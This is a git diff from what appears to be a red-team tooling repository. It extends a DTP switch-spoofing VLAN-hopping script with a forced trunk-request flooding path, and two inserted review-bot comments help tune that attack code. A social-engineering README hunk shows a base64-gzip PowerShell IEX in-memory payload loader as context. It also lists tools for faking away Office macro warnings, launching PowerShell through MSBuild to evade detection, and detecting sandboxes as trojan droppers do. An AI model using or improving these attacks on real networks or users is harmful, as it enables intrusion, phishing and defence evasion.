diff --git a/networks/VLANHopperDTP.py b/networks/VLANHopperDTP.py old mode 100644 new mode 100755 index 50dd8b5..30f33fb --- a/networks/VLANHopperDTP.py +++ b/networks/VLANHopperDTP.py @@ -274,7 +274,7 @@ def floodTrunkingRequests(): Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary())) send(frame, iface = config['interface'], verbose = False) - time.sleep(30) + time.sleep(config['timeout'] / 3) def engageDot1qSniffer(): global dot1qSnifferStarted @@ -335,6 +335,17 @@ def processDtps(dtps): attackEngaged = True time.sleep(5) + if config['force']: + Logger.ok('FORCED VLAN Hopping via Switch Spoofing.') + Logger.ok('Flooding with fake Access/Desirable DTP frames...\n') + + t = threading.Thread(target = floodTrunkingRequests) + t.daemon = True + t.start() + + attackEngaged = True + time.sleep(5) + if attackEngaged: engageDot1qSniffer() @@ -385,7 +396,7 @@ def addVlanIface(vlan): tempfiles.append(pidFile) tempfiles.append(dbFile) - Logger.info('So far so good, subinterface {} added.'.format(subif)) + Logger.dbg('So far so good, subinterface {} added.'.format(subif)) ret = False for attempt in range(3): @@ -456,7 +467,7 @@ def sniffThread(): if len(dtps) > 0 or config['force']: if len(dtps) > 0: - Logger.dbg('Got {} DTP frames.\n'.format( + Logger.info('Got {} DTP frames.\n'.format( len(dtps) )) else: @@ -572,6 +583,9 @@ def parseOptions(argv): config['commands'] = args.command config['exitcommands'] = args.exitcommand + if args.force: + config['timeout'] = 30 + return args def main(argv): diff --git a/social-engineering/README.md b/social-engineering/README.md index 1ed19e0..210148d 100644 --- a/social-engineering/README.md +++ b/social-engineering/README.md 
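Review bot: The new interval in floodTrunkingRequests, `time.sleep(config['timeout'] / 3)`, has no lower bound, so a timeout of 0 turns the keep-alive loop into a tight send loop, and a negative value makes time.sleep raise ValueError inside the thread. Where config['timeout'] is normally set is not visible in this diff, so whether such values can reach this line needs checking; if the script runs under Python 2, integer division would also make any value below 3 yield 0. A floor such as `time.sleep(max(1.0, config['timeout'] / 3.0))` keeps the frame rate bounded on the network under test. The parseOptions hunk assigns `config['timeout'] = 30` whenever `args.force` is set, which appears to discard a timeout the operator supplied; a comment there, or applying it only when no timeout was given, would make that explicit. The function body starts outside the hunk.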
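Review bot: The added `if config['force']:` block in processDtps starts a floodTrunkingRequests thread without checking `attackEngaged`, so if the branch just above it (only its last two lines are in the hunk, and it presumably starts the same thread) has already engaged, a second flooder runs and the frame rate on the segment doubles. Guarding it as `if config['force'] and not attackEngaged:` avoids that and also skips the second `time.sleep(5)`. The block repeats the thread start, flag assignment and sleep that the context suggests already exist above, so a small helper would keep the two paths in sync. processDtps starts and ends outside the hunk.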
@@ -14,6 +14,8 @@ $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); ``` +- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c)) + - **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb)) Example output **not minimized**: @@ -101,8 +103,6 @@ ngTask> ------------------------------------------------------------------------------------ ``` -- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c)) - - **`Invoke-Command-Cred-Example.ps1`** - Example of using PSRemoting with credentials passed directly from command line. ([gist](https://gist.github.com/mgeeky/de4ecf952ddce774d241b85cfbf97faf)) - **`MacroDetectSandbox.vbs`** - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))